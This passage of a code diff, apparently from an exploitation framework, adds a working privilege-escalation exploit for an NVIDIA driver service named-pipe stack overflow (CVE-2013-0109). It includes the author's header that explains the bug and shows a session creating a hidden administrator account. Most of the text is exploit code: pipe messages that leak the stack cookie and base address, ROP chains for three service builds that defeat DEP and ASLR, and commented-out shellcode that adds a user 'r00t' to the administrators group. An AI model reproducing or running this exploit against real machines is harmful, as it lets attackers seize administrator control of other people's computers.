1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d - { - uiBase = uiRetnAddress - 0x4640; - printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); - - pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); - - // Param 1: lpAddress [r11 (near rsp) into rcx] - pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn - pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn - pRopChain[2] = 0; // Padding - pRopChain[3] = 0; // ... - pRopChain[4] = 0; // ... - pRopChain[5] = 0; // ... - pRopChain[6] = 0; // ... - pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn - pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] - pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn - pRopChain[10] = 0; // Padding - pRopChain[11] = 0; // ... - pRopChain[12] = 0; // ... - pRopChain[13] = 0; // ... - pRopChain[14] = 0; // ... - pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn - pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] - pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn - // Param 4: lpflOldProtect [r9 - already points at writable location] - pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect - pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn - pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax - pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) - - memcpy(pRopChain + 22, code, sizeof(code)); - } - break; - case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f - { - uiBase = uiRetnAddress - 0x39f1; - printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); - - pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); - - // Param 1: lpAddress [r11 (near rsp) into rcx] - pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn - pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn - pRopChain[2] = 0; // Padding ... - pRopChain[3] = 0; // ... - pRopChain[4] = 0; // ... - pRopChain[5] = 0; // ... - pRopChain[6] = 0; // ... - pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn - pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] - pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn - pRopChain[10] = 0; // Padding ... - pRopChain[11] = 0; // ... - pRopChain[12] = 0; // ... - pRopChain[13] = 0; // ... - pRopChain[14] = 0; // ... - // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] - pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn - pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE - pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn - pRopChain[18] = 0; // Padding ... - pRopChain[19] = 0; // ... - pRopChain[20] = 0; // ... - pRopChain[21] = 0; // ... - pRopChain[22] = 0; // ... - // Param 4: lpflOldProtect [r9 - already points at writable location] - pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn - pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130 - pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn - pRopChain[26] = 0; // Padding ... - pRopChain[27] = 0; // ... - pRopChain[28] = 0; // ... - pRopChain[29] = 0; // ... - pRopChain[30] = 0; // ... - pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax - pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp - - memcpy(pRopChain + 33, code, sizeof(code)); - } - break; - case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b - { - uiBase = uiRetnAddress - 0x3a11; - printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); - - pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); - - // Param 1: lpAddress [r11 (near rsp) into rcx] - pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn - pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn - pRopChain[2] = 0; // Padding ... - pRopChain[3] = 0; // ... - pRopChain[4] = 0; // ... - pRopChain[5] = 0; // ... - pRopChain[6] = 0; // ... - pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn - pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] - pRopChain[9] = 0; // Padding ... - // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] - pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn - pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE - pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn - pRopChain[13] = 0; // Padding ... - pRopChain[14] = 0; // ... - pRopChain[15] = 0; // ... - pRopChain[16] = 0; // ... - pRopChain[17] = 0; // ... - // Param 4: lpflOldProtect [r9 - already points at writable location] - pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn - pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 - pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn - pRopChain[21] = 0; // Padding ... - pRopChain[22] = 0; // ... - pRopChain[23] = 0; // ... - pRopChain[24] = 0; // ... - pRopChain[25] = 0; // ... - pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax - pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn - - memcpy(pRopChain + 28, code, sizeof(code)); - } - break; - } - - break; - } - - i++; - } - - dwReturnCode = 0; -Cleanup: - if(hPipe) - CloseHandle(hPipe); - - return dwReturnCode; -} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln b/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln new file mode 100755 index 0000000000..9a52c16683 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln @@ -0,0 +1,22 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c new file mode 100755 index 0000000000..c75822e96b --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c @@ -0,0 +1,33 @@ +//===============================================================================================// +// This is a stub for the actual functionality of the DLL. +//===============================================================================================// + +#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR +#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" + +#include "nvidia_nvsvc.h" + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + switch (dwReason) + { + case DLL_QUERY_HMODULE: + hAppInstance = hinstDLL; + if (lpReserved != NULL) + { + *(HMODULE *)lpReserved = hAppInstance; + } + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + elevate_nvidia_nvsvc(lpReserved); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp new file mode 100755 index 0000000000..167834047c --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp @@ -0,0 +1,546 @@ +/* +NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 +- Bypass DEP + ASLR + /GS + CoE +============================================================= +(@peterwintrsmith) + + ** Initial release 25/12/12 + ** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks + @seanderegge! + +Hey all! + +Here is an interesting exploit for a stack buffer overflow in the NVidia +Display Driver Service. The service listens on a named pipe (\pipe\nsvr) +which has a NULL DACL configured, which should mean that any logged on user +or remote user in a domain context (Windows firewall/file sharing +permitting) should be able to exploit this vulnerability. + +The buffer overflow occurs as a result of a bad memmove operation, with the +stack layout effectively looking like this: + +[locals] +[received-data] +[response-buf] +[stack cookie] +[return address] +[arg space] +[etc] + +The memmove copies data from the received-data buffer into the response-buf +buffer, unchecked. It is possible to control the offset from which the copy +starts in the received-data buffer by embedding a variable length string - +which forms part of the protocol message being crafted - as well as the +number of bytes copied into the response buffer. + +The amount of data sent back over the named pipe is related to the number +of bytes copied rather than the maximum number of bytes that the buffer is +able to safely contain, so it is possible to leak stack data by copying +from the end of the received-data buffer, through the response-buf buffer +(which is zeroed first time round, and second time round contains whatever +was in it beforehand), right to the end of the stack frame (including stack +cookie and return address). + +As the entire block of data copied is sent back, the stack cookie and +nvvsvc.exe base can be determined using the aforementioned process. The +stack is then trashed, but the function servicing pipe messages won't +return until the final message has been received, so it doesn't matter too +much. + +It is then possible to exploit the bug by sending two further packets of +data: One containing the leaked stack cookie and a ROP chain dynamically +generated using offsets from the leaked nvvsvc.exe base (which simply fills +the response-buf buffer when this data is echoed back) and a second packet +which contains enough data to trigger an overwrite if data is copied from +the start of the received-data buffer into the response-buf (including the +data we primed the latter to contain - stack cookie and ROP chain). + +Allowing the function to then return leads to execution of our ROP chain, +and our strategically placed Metasploit net user /add shellcode! We get +continuation of execution for free because the process spins up a thread +to handle each new connection, and there are no deadlocks etc. + +I've included two ROP chains, one which works against the nvvsvc.exe +running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers +from the Dell site, and one which works against the latest version of the +drivers for the same card, from: +http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m +http://www.geforce.co.uk/drivers/results/54709 + +Hope you find this interesting - it's a fun bug to play with! + +- Sample Session - + + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +The command completed successfully. + + +C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 + ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** + [@peterwintrsmith] + - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - + + Action 1 of 9: - CONNECT + + Action 2 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 3 of 9: - SERVER => CLIENT + Read 16504 (0x4078) characters from pipe + + Action 4 of 9: Building exploit ... + => Stack cookie 0xe2e2893340d4: + => nvvsvc.exe base 0x13fb90000: + + Action 5 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 6 of 9: - SERVER => CLIENT + Read 16384 (0x4000) characters from pipe + + Action 7 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 8 of 9: - SERVER => CLIENT + Read 16896 (0x4200) characters from pipe + + Action 9 of 9: - DISCONNECT + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +r00t +The command completed successfully. + + +C:\Users\Peter\Desktop\NVDelMe1> + +*/ + +#include +#include +extern "C" { +#include "nvidia_nvsvc.h" +} + +enum EProtocolAction +{ + ProtocolAction_Connect = 0, + ProtocolAction_Receive, + ProtocolAction_Send, + ProtocolAction_Disconnect, + ProtocolAction_ReadCookie, +}; + +typedef struct +{ + EProtocolAction Action; + PBYTE Buf; + DWORD Length; +} ProtocolMessage; + +const int GENERIC_BUF_LENGTH = 0x10000; + +#define WriteByte(val) {buf[offs] = val; offs += 1;} +#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} +#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} +#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} +#define BufRemaining() (sizeof(buf) - offs) + +DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) +{ + DWORD dwWritten = 0; + + if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) + { + return dwWritten; + } + + return 0; +} + +DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) +{ + DWORD dwRead = 0, dwAvailable = 0; + + if (bTimeout) + { + for (DWORD i = 0; i < 30; i++) + { + if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) + { + goto Cleanup; + } + + if (dwAvailable) + { + break; + } + + Sleep(100); + } + + if (!dwAvailable) + { + goto Cleanup; + } + } + + if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) + { + goto Cleanup; + } + +Cleanup: + return dwRead; +} + +HANDLE EstablishPipeConnection(char *pszPipe) +{ + HANDLE hPipe = CreateFileA( + pszPipe, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + 0, + NULL + ); + + if (hPipe == INVALID_HANDLE_VALUE) + { + return NULL; + } + + return hPipe; +} + +BYTE *BuildMalicious_LeakStack() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + + for(UINT i=0; i<0x2000; i++) + WriteWord(0x41); + + WriteWord(0); + + WriteDword(0); + WriteDword(0x4078); + + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + + return buf; +} + +BYTE *BuildMalicious_FillBuf() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4000); + + while(BufRemaining()) + WriteDword(0x43434343); + + return buf; +} + +BYTE *BuildMalicious_OverwriteStack() +{ + static BYTE buf[0x4020] = { 0 }; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4340); // enough to copy shellcode too + + while (BufRemaining()) + { + WriteDword(0x42424242); + } + + return buf; +} + +/*! + * @brief Entry point for the exploit code. + * @param payload Pointer to the payload memory, which must be NULL terminated. + */ +VOID elevate_nvidia_nvsvc(LPVOID payload) +{ + SIZE_T payloadLen = strlen(payload) + 1; + DWORD dwReturnCode = 1, dwBytesInOut = 0; + HANDLE hPipe = NULL; + + static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 }; + + memset(rgReadBuf, 0, sizeof(rgReadBuf)); + + ProtocolMessage rgConvoMsg[] = + { + { ProtocolAction_Connect, NULL, 0 }, + { ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4200 }, + { ProtocolAction_ReadCookie, { 0 }, 0 }, + { ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4000 }, + { ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4200 }, + { ProtocolAction_Disconnect, NULL, 0 }, + }; + + DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; + BOOL bTryAgain = FALSE; + char szPipe[256] = "\\\\.\\pipe\\nvsr"; + + // We could renable remote hosts to target other devices on network?! + // sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); + + while (i < dwNumberOfMessages) + { + printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); + + switch (rgConvoMsg[i].Action) + { + case ProtocolAction_Connect: + printf(" - CONNECT\n"); + + hPipe = EstablishPipeConnection(szPipe); + if (!hPipe) + { + printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); + goto Cleanup; + } + + break; + case ProtocolAction_Disconnect: + printf(" - DISCONNECT\n"); + + CloseHandle(hPipe); + hPipe = NULL; + + break; + case ProtocolAction_Send: + printf(" - CLIENT => SERVER\n"); + + if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) + { + printf("!! Error writing to pipe\n"); + goto Cleanup; + } + + printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_Receive: + printf("\t - SERVER => CLIENT\n"); + + if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) + { + printf("!! Error reading from pipe (at least, no data on pipe)\n"); + goto Cleanup; + } + + printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_ReadCookie: + + // x64 Metasploit cmd/exec: + // "net user r00t r00t00r! /add & net localgroup administrators /add" + // exitfunc=thread + /*char code[] = "" + "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" + "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" + "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" + "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" + "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" + "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" + "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" + "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" + "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" + "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" + "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" + "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" + "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" + "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" + "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" + "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" + "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" + "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" + "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" + "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" + "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" + "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/ + printf("Building exploit ...\n"); + unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); + printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); + + memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); + + unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; + + // Perform some limited fingerprinting (my default install version, vs latest at time of testing) + switch (uiRetnAddress & 0xfff) + { + case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d + uiBase = uiRetnAddress - 0x4640; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn + pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... + pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn + pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect + pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn + pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax + pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) + + memcpy(pRopChain + 22, payload, payloadLen); + break; + case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f + uiBase = uiRetnAddress - 0x39f1; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn + pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding ... + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... + // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[18] = 0; // Padding ... + pRopChain[19] = 0; // ... + pRopChain[20] = 0; // ... + pRopChain[21] = 0; // ... + pRopChain[22] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130 + pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn + pRopChain[26] = 0; // Padding ... + pRopChain[27] = 0; // ... + pRopChain[28] = 0; // ... + pRopChain[29] = 0; // ... + pRopChain[30] = 0; // ... + pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax + pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp + + memcpy(pRopChain + 33, payload, payloadLen); + break; + case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b + uiBase = uiRetnAddress - 0x3a11; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn + pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = 0; // Padding ... + // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[13] = 0; // Padding ... + pRopChain[14] = 0; // ... + pRopChain[15] = 0; // ... + pRopChain[16] = 0; // ... + pRopChain[17] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn + pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 + pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn + pRopChain[21] = 0; // Padding ... + pRopChain[22] = 0; // ... + pRopChain[23] = 0; // ... + pRopChain[24] = 0; // ... + pRopChain[25] = 0; // ... + pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax + pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn + + memcpy(pRopChain + 28, payload, payloadLen); + break; + } + + break; + } + + i++; + } + +Cleanup: + if (hPipe) + { + CloseHandle(hPipe); + } +} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h new file mode 100755 index 0000000000..697b58450b --- /dev/null +++ 